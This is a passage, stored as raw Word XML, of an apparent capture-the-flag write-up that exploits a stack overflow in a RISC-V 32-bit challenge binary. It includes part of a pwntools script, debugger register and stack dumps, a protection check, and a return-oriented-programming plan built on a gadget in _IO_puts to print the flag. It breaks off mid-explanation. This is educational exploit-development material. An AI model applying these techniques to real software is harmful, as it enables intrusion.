          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        recvd = io.recvall(timeout=2)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        if b"Config Table" in recvd:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            log.success(recvd.decode())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Baby's Second RISC-V Stack Smash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    No free pointers this time and pwning might be more difficult!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Exploit me!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">             Config Table</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ------------------------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    |Application Name : Baby dROP|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    |      A1_MSG_LEN : 40       |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    |      A2_MSG_LEN : 10       |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    |      B1_MSG_LEN : 20       |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    |      B2_MSG_LEN : 300      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    |      CC_MSG_LEN : 25       |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    |      ZY_MSG_LEN : 0        |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    |   SILENT_ERRORS : TRUE     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here we can see that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">B2_MSG_LEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is set to 300. As already mentioned, this leads to a stack overflow since the maximum size for a message should be 100.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4000500" cy="523875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="33" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./images/04.png" id="34" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000500" cy="523875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5057775" cy="4248150"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="36" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./images/05.png" id="37" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5057775" cy="4248150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[ Legend: Modified register | Code | Heap | Stack | String ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$zero: 0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$ra  : 0x62616165  →  0x62616165</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$sp  : 0x40800d90  →  0x62616166  →  0x62616166</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$gp  : 0x0006ea84  →  0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$tp  : 0x000724e0  →  0x0006dd50  →  0x0006b998  →  0x0004fda4  →  0x00000043  →  0x00000043</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$t0  : 0x00000001  →  0x00000001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$t1  : 0x19999999  →  0x19999999</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$t2  : 0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$fp  : 0x62616164  →  0x62616164</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s1  : 0x00000001  →  0x00000001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$a0  : 0xffffffff</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$a1  : 0x40800d18  →  0x61616161  →  0x61616161</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$a2  : 0x00000128  →  0x00000128</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$a3  : 0x00002000  →  0x00002000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$a4  : 0xffffffff</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$a5  : 0xffffffff</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$a6  : 0x00073d03  →  0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$a7  : 0x0000003f  →  0x0000003f</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s2  : 0x00000001  →  0x00000001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s3  : 0x40800f04  →  0x40800fbe  →  0x706f7264  →  0x706f7264</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s4  : 0x40800f0c  →  0x40800fc8  →  0x454d4954  →  0x454d4954</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s5  : 0x00000001  →  0x00000001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s6  : 0x00010fca  →  0xde067139  →  0xde067139</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s7  : 0x00010230  →  0xc6061141  →  0xc6061141</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s8  : 0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s9  : 0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s10 : 0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$s11 : 0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$t3  : 0x00000009  →  0x00000009</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$t4  : 0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$t5  : 0x00054dc4  →  0x00000000  →  0x00000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$t6  : 0x00000005  →  0x00000005</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">──────────────────────────────────────────────────────────────────────────────────────────────── code:riscv:RISCV ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x10f9e &lt;do_b2+74&gt;       j      0x10fa2 &lt;do_b2+78&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x10fa0 &lt;do_b2+76&gt;       li     a5, 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x10fa2 &lt;do_b2+78&gt;       mv     a0, a5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> →    0x10faa &lt;do_b2+86&gt;       ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[!] Cannot disassemble from $PC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800d90│+0x0000: 0x62616166  →  0x62616166    ← $sp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800d94│+0x0004: 0x62616167  →  0x62616167</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800d98│+0x0008: 0x62616168  →  0x62616168</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800d9c│+0x000c: 0x62616169  →  0x62616169</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800da0│+0x0010: 0x6261616a  →  0x6261616a</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800da4│+0x0014: 0x6261616b  →  0x6261616b</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800da8│+0x0018: 0x6261616c  →  0x6261616c</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800dac│+0x001c: 0x6261616d  →  0x6261616d</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[#0] Id 1, stopped 0x10faa in do_b2 (), reason: BREAKPOINT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[#0] 0x10faa → do_b2(size=0x12c)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gef➤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So now we have a stack overflow, and these are the protections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] '/home/tt3/Workspace/dropbaby/drop-baby'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Arch:     em_riscv-32-little</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    RELRO:    Partial RELRO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Stack:    No canary found</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    NX:       NX enabled</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    PIE:      No PIE (0x10000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The stack is non-executable, so the only option left is to perform a ROP. What we need is just a call to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts(flag)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The flag is stored at a fixed stack address, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is also at a fixed address. There is no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in this binary. However, the problem is that, unlike the Intel architecture, RiscV/32 passes the arguments in the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">registers. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">instruction just puts the content of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">register in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Therefore, what we really need are some gadgets that set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">based on stack values. Fortunately, there is a single gadget that can enable us to do both at address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x167D2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gef➤  x/9i 0x167D2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167d2 &lt;_IO_puts+150&gt;:      lw      ra,28(sp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167d4 &lt;_IO_puts+152&gt;:      mv      a0,s0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167d6 &lt;_IO_puts+154&gt;:      lw      s0,24(sp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167d8 &lt;_IO_puts+156&gt;:      lw      s1,20(sp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167da &lt;_IO_puts+158&gt;:      lw      s2,16(sp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167dc &lt;_IO_puts+160&gt;:      lw      s3,12(sp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167de &lt;_IO_puts+162&gt;:      lw      s4,8(sp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167e0 &lt;_IO_puts+164&gt;:      add     sp,sp,32</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   0x167e2 &lt;_IO_puts+166&gt;:      ret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here you can see that this gadget sets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
